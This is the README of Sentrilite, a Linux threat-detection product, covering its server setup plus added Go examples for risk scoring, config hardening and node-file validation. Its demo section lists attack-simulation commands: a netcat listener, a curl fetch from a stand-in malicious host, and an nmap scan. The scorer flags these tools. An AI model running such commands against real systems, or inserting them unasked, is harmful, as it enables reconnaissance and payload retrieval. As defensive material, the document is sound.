Website: https://sentrilite.com
Contact: info@sentrilite.com
This demo shows real-time detection and automatic termination of malicious activity on a live Linux system using Sentrilite:

- Detection of active threats during execution
- Risk scoring based on syscall + process + network behavior
- Automatic process termination for high-risk activity
| Color | Category | Meaning |
|---|---|---|
| 🔴 Red | Critical Risk | Confirmed malicious behavior with high confidence |
| 🟠 Orange | Medium Risk | Suspicious activity requiring investigation |
| 🟣 Purple | Active Response | Enforcement action taken – process terminated |
The following commands were used for simulation:

```sh
sudo nc -l 5000
curl http://malicious_payload.com >/dev/null 2>&1
nmap -p 22,80,443 127.0.0.1 >/dev/null 2>&1
```
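As an added illustration, not Sentrilite's own code or scoring model, the Go program below shows how syscall, process and network signals from the three simulation commands can be aggregated into a per-process risk score and mapped to the colour categories in the table above (Medium, Critical, and termination for Critical). The event schema, weights and thresholds are assumptions made for this example, and the telemetry events are constructed to mirror the nc listener, the curl to a blocklisted host, and the three-port nmap run.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// Event is a constructed, simplified telemetry record (assumption: not Sentrilite's schema).
type Event struct {
	PID  int
	Comm string // executable name
	Kind string // "exec", "listen" or "connect"
	Port int    // local port for listen, remote port for connect
	Dest string // remote host for connect
}

// Verdict mirrors the dashboard colour table: Medium, Critical, or None,
// plus whether this illustrative policy would terminate the process.
type Verdict struct {
	PID       int
	Comm      string
	Score     int
	Category  string
	Terminate bool
	Reasons   []string
}

// ScoreEvents aggregates a per-process score from process and network signals.
// Weights and thresholds are made up for illustration.
func ScoreEvents(events []Event, blocklist map[string]bool) []Verdict {
	type acc struct {
		comm    string
		score   int
		reasons []string
		ports   map[int]bool
	}
	byPID := map[int]*acc{}
	for _, e := range events {
		a, ok := byPID[e.PID]
		if !ok {
			a = &acc{comm: e.Comm, ports: map[int]bool{}}
			byPID[e.PID] = a
		}
		switch e.Kind {
		case "listen":
			// An unexpected listener is a persistence/backdoor signal.
			a.score += 40
			a.reasons = append(a.reasons, fmt.Sprintf("listening on port %d", e.Port))
		case "connect":
			if blocklist[strings.ToLower(e.Dest)] {
				a.score += 80
				a.reasons = append(a.reasons, "outbound connection to blocklisted host "+e.Dest)
			}
			// Many distinct destination ports from one process look like a scan.
			a.ports[e.Port] = true
			if len(a.ports) == 3 {
				a.score += 60
				a.reasons = append(a.reasons, "connections to 3+ distinct ports (possible scan)")
			}
		case "exec":
			if e.Comm == "nmap" || e.Comm == "nc" {
				a.score += 20
				a.reasons = append(a.reasons, "execution of network/recon tool "+e.Comm)
			}
		}
	}
	var out []Verdict
	for pid, a := range byPID {
		v := Verdict{PID: pid, Comm: a.comm, Score: a.score, Reasons: a.reasons, Category: "None"}
		if a.score >= 80 {
			v.Category, v.Terminate = "Critical", true // red, then purple once enforced
		} else if a.score >= 40 {
			v.Category = "Medium" // orange: investigate
		}
		out = append(out, v)
	}
	sort.Slice(out, func(i, j int) bool { return out[i].PID < out[j].PID })
	return out
}

// DemoVerdicts replays constructed events modelled on the simulation commands.
func DemoVerdicts() []Verdict {
	events := []Event{
		{PID: 101, Comm: "nc", Kind: "exec"},
		{PID: 101, Comm: "nc", Kind: "listen", Port: 5000},
		{PID: 102, Comm: "curl", Kind: "exec"},
		{PID: 102, Comm: "curl", Kind: "connect", Port: 80, Dest: "malicious_payload.com"},
		{PID: 103, Comm: "nmap", Kind: "exec"},
		{PID: 103, Comm: "nmap", Kind: "connect", Port: 22, Dest: "127.0.0.1"},
		{PID: 103, Comm: "nmap", Kind: "connect", Port: 80, Dest: "127.0.0.1"},
		{PID: 103, Comm: "nmap", Kind: "connect", Port: 443, Dest: "127.0.0.1"},
	}
	return ScoreEvents(events, map[string]bool{"malicious_payload.com": true})
}

func main() {
	for _, v := range DemoVerdicts() {
		fmt.Printf("pid=%d comm=%s score=%d category=%s terminate=%v reasons=%v\n",
			v.PID, v.Comm, v.Score, v.Category, v.Terminate, v.Reasons)
	}
}
```

With these weights the nc listener scores 60 (Medium, investigate), while the curl to the blocklisted host and the three-port scan each reach 80 (Critical, terminate), which is the ordering a defender would expect from the three commands.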
Sentrilite Server is the main control plane for Sentrilite agents. It ingests real-time telemetry from endpoints, servers and Kubernetes nodes, correlates alerts, and exposes everything through a single web dashboard and API.
- Centralized Control Plane: Manage and monitor all Sentrilite agents from a single server across cloud, on-prem, and Kubernetes environments.
- Manage Alerts: All alerts are encrypted with TLS and saved to a centralized PostgreSQL database.
- Real-Time Telemetry Ingestion: High-throughput ingestion of structured process, file, and network events streamed from agents in real time.
- Unified Web Dashboard: Web UI for live event streaming, alert triage, node health, rule management, and reporting.
- Detection-as-Code & Response (DACR): Define and manage detection rules centrally using JSON. Rules are applied instantly across all connected agents, with no restarts or redeploys.
- Risk Scoring & Alerting: Events are tagged, scored, and escalated into alerts with clear context for fast triage and response.
- AI / Heuristic Insights (Optional): Generate per-node security insights using LLMs or built-in heuristics to summarize alerts and highlight suspicious behavior.
- Audit & Reporting: Export audit-ready reports (PDF / JSON / CSV) with timelines, risky activity, and per-node summaries.
- Kubernetes-Aware: Understands nodes, pods, containers, and namespaces when agents run as DaemonSets, presenting normalized data in the UI.
- Integrations: Forward alerts to existing tooling such as Prometheus Alertmanager, PagerDuty, Slack, or external SIEMs.
- Scalable & Lightweight: Designed to handle high event volumes with minimal operational overhead.
| File | Purpose |
|---|---|
| install_db.sh | Script to load the eBPF kernel module |
| sentrilite-serverctl.sh | Script to start/stop sentrilite-server |
| sentrilite-server | Go control-plane server that accepts alerts from agents and hosts the admin dashboard |
| ui/sentrilite.html | Main frontend UI for viewing node status, alerts, reports, etc. |
| ss.conf | Configuration file for Sentrilite Server |
| server.cnf | Configuration file for generating keys |
| license.key | Sentrilite license key file |
| LICENSE.txt | Sentrilite License Agreement |
| gen_keys.txt | Instructions to create TLS/SSL/JWT keys for authentication/authorization |
| README.md | This document |
- Ports: 8080 (dashboard), 9765 (WebSocket for agents)
- PostgreSQL: alerts are saved to the PostgreSQL database created by the installation script.
- License: the project is currently using a trial license.key.
- SIEMs: can seamlessly integrate with third-party SIEM tools.
- Alerting: can push alerts to PagerDuty / Prometheus Alertmanager.
- Unzip the bundle:

```sh
unzip sentrilite_server_bundle.zip
cd sentrilite-server
```

- Start the Postgres server and create the sentrilite database:

```sh
sudo -u sentrilite psql -d sentrilite
```

```sql
CREATE USER sentrilite WITH PASSWORD 'prod';
CREATE DATABASE sentrilite OWNER sentrilite;
```

```sh
sudo ./install_db.sh
```

- Generate the SSL/TLS keys: refer to gen_keys.txt. The keys generated should be: CA certs, server certs, agent certs, and JWT keys (for agent authentication).
- Open ss.conf and configure:

```ini
LICENSE_FILE_PATH=./license.key
LISTEN_ADDR=:9765
# TLS / mTLS
TLS_CERT=ss.crt
TLS_KEY=ss.key
TLS_CA=ca.crt
# JWT
JWT_PRIVATE_KEY=jwt_private.pem
JWT_PUBLIC_KEY=jwt_public.pem
DATABASE_URL=postgres://sentrilite:prod@localhost:5432/sentrilite?sslmode=disable
ADMIN_USERNAME=
ADMIN_PASSWORD=
# LLM integration
LLM_ENABLED=false
LLM_URL=
# AI insights refresh interval
AI_INSIGHTS_INTERVAL_MINUTES=1
# Max alerts considered per node
AI_INSIGHTS_MAX_ALERTS=50
```
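The sample ss.conf above ships with empty admin credentials, a short database password embedded in DATABASE_URL and sslmode=disable, all of which a reviewer would want changed before the server is reachable from anything but localhost. As an added example, not part of the Sentrilite bundle, the Go program below parses a KEY=VALUE file in that format and reports such findings; the rules, the 12-character password threshold and the hardened sample values are this example's own assumptions.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"sort"
	"strings"
)

// ParseConf reads KEY=VALUE lines in the ss.conf style, ignoring blank
// lines and '#' comments. Unknown keys are kept as-is.
func ParseConf(text string) map[string]string {
	conf := map[string]string{}
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		kv := strings.SplitN(line, "=", 2)
		if len(kv) != 2 {
			continue
		}
		conf[strings.TrimSpace(kv[0])] = strings.TrimSpace(kv[1])
	}
	return conf
}

// CheckConf returns sorted findings for settings to harden before exposing
// the server. The rules below are this example's own, not Sentrilite's.
func CheckConf(conf map[string]string) []string {
	var findings []string
	if conf["ADMIN_USERNAME"] == "" || conf["ADMIN_PASSWORD"] == "" {
		findings = append(findings, "ADMIN_USERNAME/ADMIN_PASSWORD are empty; set a strong dashboard credential")
	}
	u, err := url.Parse(conf["DATABASE_URL"])
	if err != nil || (u.Scheme != "postgres" && u.Scheme != "postgresql") {
		findings = append(findings, "DATABASE_URL is missing or not a postgres:// URL")
	} else {
		if u.Query().Get("sslmode") == "disable" {
			findings = append(findings, "DATABASE_URL uses sslmode=disable; use sslmode=require or verify-full unless Postgres is local-only")
		}
		if u.User != nil {
			if pw, set := u.User.Password(); set && len(pw) < 12 {
				findings = append(findings, "DATABASE_URL embeds a short database password; rotate it and restrict ss.conf file permissions")
			}
		}
	}
	for _, k := range []string{"TLS_CERT", "TLS_KEY", "TLS_CA", "JWT_PRIVATE_KEY", "JWT_PUBLIC_KEY", "LICENSE_FILE_PATH"} {
		if conf[k] == "" {
			findings = append(findings, k+" is not set; mTLS/JWT agent authentication needs it")
		}
	}
	if strings.EqualFold(conf["LLM_ENABLED"], "true") {
		if conf["LLM_URL"] == "" {
			findings = append(findings, "LLM_ENABLED=true but LLM_URL is empty")
		} else if !strings.HasPrefix(conf["LLM_URL"], "https://") {
			findings = append(findings, "LLM_URL is not https://; alert content would leave the host in cleartext")
		}
	}
	sort.Strings(findings)
	return findings
}

// SampleConfAsShipped is a constructed copy of the configuration shown above.
const SampleConfAsShipped = `LICENSE_FILE_PATH=./license.key
LISTEN_ADDR=:9765
# TLS / mTLS
TLS_CERT=ss.crt
TLS_KEY=ss.key
TLS_CA=ca.crt
JWT_PRIVATE_KEY=jwt_private.pem
JWT_PUBLIC_KEY=jwt_public.pem
DATABASE_URL=postgres://sentrilite:prod@localhost:5432/sentrilite?sslmode=disable
ADMIN_USERNAME=
ADMIN_PASSWORD=
LLM_ENABLED=false
LLM_URL=
`

// SampleConfHardened is the same file with constructed placeholder secrets
// (assumption: not real credentials) and TLS to Postgres enforced.
const SampleConfHardened = `LICENSE_FILE_PATH=./license.key
LISTEN_ADDR=:9765
TLS_CERT=ss.crt
TLS_KEY=ss.key
TLS_CA=ca.crt
JWT_PRIVATE_KEY=jwt_private.pem
JWT_PUBLIC_KEY=jwt_public.pem
DATABASE_URL=postgres://sentrilite:Example-Long-Db-Passw0rd@localhost:5432/sentrilite?sslmode=verify-full
ADMIN_USERNAME=admin
ADMIN_PASSWORD=Example-Long-Admin-Passw0rd
LLM_ENABLED=false
`

func main() {
	for _, name := range []string{"as shipped", "hardened"} {
		text := SampleConfAsShipped
		if name == "hardened" {
			text = SampleConfHardened
		}
		fmt.Printf("%s: %d finding(s)\n", name, len(CheckConf(ParseConf(text))))
		for _, f := range CheckConf(ParseConf(text)) {
			fmt.Println("  -", f)
		}
	}
}
```

Run against the shipped sample it reports three findings (empty admin credentials, the short embedded password, and sslmode=disable); the hardened sample reports none. Keeping the check in the deployment pipeline prevents the trial configuration from reaching a server that agents on other hosts can reach.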
- Launch the server:

```sh
sudo ./sentrilite-serverctl.sh start
```

- Open the dashboard in your browser: http://<server-address>:8080/sentrilite.html

Click "Choose node file" and select a file containing your server list. Example file format:

```csv
Server_1_ip_address,prod
Server_2_ip_address,test
```

Once uploaded correctly, the Sentrilite agent will monitor and show status, alerts, and AI insights for these servers.
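An added example, not the dashboard's own loader: a Go parser for the two-column node file shown above that validates each row before it is uploaded. It treats the first column as a literal IP address (IPv4 or IPv6), skips blank lines and '#' comments, rejects duplicate addresses and malformed rows, and returns one message per bad line so the whole file is reported at once. The validation rules are this example's own; the constructed input deliberately includes the Server_1_ip_address placeholder from the format example to show that it is rejected until replaced with a real address.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"strings"
)

// Node is one accepted row of the node file: address and environment label.
type Node struct {
	Addr string
	Env  string
}

// ParseNodeFile validates "address,env" rows and returns the accepted nodes
// plus one error message per rejected line. Rules are this example's own.
func ParseNodeFile(text string) ([]Node, []string) {
	var nodes []Node
	var errs []string
	seen := map[string]bool{}
	sc := bufio.NewScanner(strings.NewReader(text))
	lineNo := 0
	for sc.Scan() {
		lineNo++
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		parts := strings.Split(line, ",")
		if len(parts) != 2 {
			errs = append(errs, fmt.Sprintf("line %d: expected 'address,env', got %q", lineNo, line))
			continue
		}
		addr, env := strings.TrimSpace(parts[0]), strings.TrimSpace(parts[1])
		ip := net.ParseIP(addr)
		if ip == nil {
			// Hostnames and unreplaced placeholders both land here.
			errs = append(errs, fmt.Sprintf("line %d: %q is not a valid IP address", lineNo, addr))
			continue
		}
		if env == "" {
			errs = append(errs, fmt.Sprintf("line %d: missing environment label", lineNo))
			continue
		}
		key := ip.String() // canonical form, so 2001:db8::10 and 2001:0db8::10 collide
		if seen[key] {
			errs = append(errs, fmt.Sprintf("line %d: duplicate node %s", lineNo, key))
			continue
		}
		seen[key] = true
		nodes = append(nodes, Node{Addr: key, Env: env})
	}
	return nodes, errs
}

// SampleNodeFile is a constructed input mixing valid and invalid rows.
const SampleNodeFile = `# constructed sample node file
10.0.0.5,prod
10.0.0.6 , test
Server_1_ip_address,prod
10.0.0.5,prod
10.0.0.7
2001:db8::10,staging
`

func main() {
	nodes, errs := ParseNodeFile(SampleNodeFile)
	for _, n := range nodes {
		fmt.Printf("node %s (%s)\n", n.Addr, n.Env)
	}
	for _, e := range errs {
		fmt.Println("rejected:", e)
	}
}
```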
For more detailed information, refer to dashboard.README.

Required files:

- license.key: place in the current directory (baked into the image or mounted as a Secret).
- ss.conf: configuration file

To stop the server:

```sh
sudo ./sentrilite-serverctl.sh stop
```
For licensing, troubleshooting, or feature requests: